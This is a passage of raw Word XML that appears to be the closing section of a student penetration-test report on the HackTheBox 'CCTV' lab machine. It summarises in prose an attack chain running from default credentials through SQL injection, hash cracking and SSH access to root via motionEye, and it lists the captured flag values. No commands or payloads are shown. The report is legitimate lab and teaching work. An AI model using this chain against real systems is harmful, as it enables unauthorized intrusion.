          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The four vulnerabilities formed a chain where each one unlocked the next: default credentials gave authenticated access, authenticated access enabled SQL injection, SQL injection provided password hashes, cracked hashes gave SSH access, and SSH access revealed the motionEye service that led to root. Remove any single link in that chain and the attack stops.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table42"/>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a4a" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="140.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="140.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000209">
            <w:pPr>
              <w:spacing w:after="40" w:before="80" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Flags Captured — Full System Compromise Confirmed</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020A">
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="bdd7ee"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">User Flag: </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">003488f02441d3fb0b4c7a7aa3ddacdc</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020B">
            <w:pPr>
              <w:spacing w:after="80" w:before="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="ff6b6b"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Root Flag:  </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">207c878c2b801577ca2d89f4dfc2cb3f</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020C">
      <w:pPr>
        <w:spacing w:after="0" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020D">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:color="2e75b6" w:space="1" w:sz="12" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="80" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020E">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020F">
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="1b2a4a"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">End of Report</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000210">
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Presented by Ryan Musyoki  |  Final Year Cybersecurity Project  |  April 2026</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000211">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing Period: 12th April 2026 — 20th April 2026</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId29" w:type="default"/>
      <w:footerReference r:id="rId30"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Bdr>
        <w:top w:color="2e75b6" w:space="1" w:sz="12" w:val="single"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:leader="none" w:pos="9720"/>
      </w:tabs>
      <w:spacing w:after="0" w:before="80" w:lineRule="auto"/>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">  Ryan Musyoki  |  Final Year Cybersecurity Project  |  12th–20th April 2026For Academic Use Only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bottom w:color="2e75b6" w:space="1" w:sz="12" w:val="single"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:leader="none" w:pos="9720"/>
      </w:tabs>
      <w:spacing w:after="80" w:before="0" w:lineRule="auto"/>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:color w:val="1b2a4a"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">  Penetration Test Report — HackTheBox: CCTV Machine</w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:color w:val="c00000"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">CONFIDENTIAL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Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:smallCaps w:val="0"/>
      <w:strike w:val="0"/>
      <w:color w:val="1b2a4a"/>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80" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:smallCaps w:val="0"/>
      <w:strike w:val="0"/>
      <w:color w:val="2e75b6"/>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40404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4.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2.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><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6.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId3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17.png"/><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L6HJP8HSZRkLxbMTTgLHbq5JA==">CgMxLjA4AHIhMXZYUlhGRnp2N1BTLXRrZWpIemkzQko3YUl3dnJTNzVI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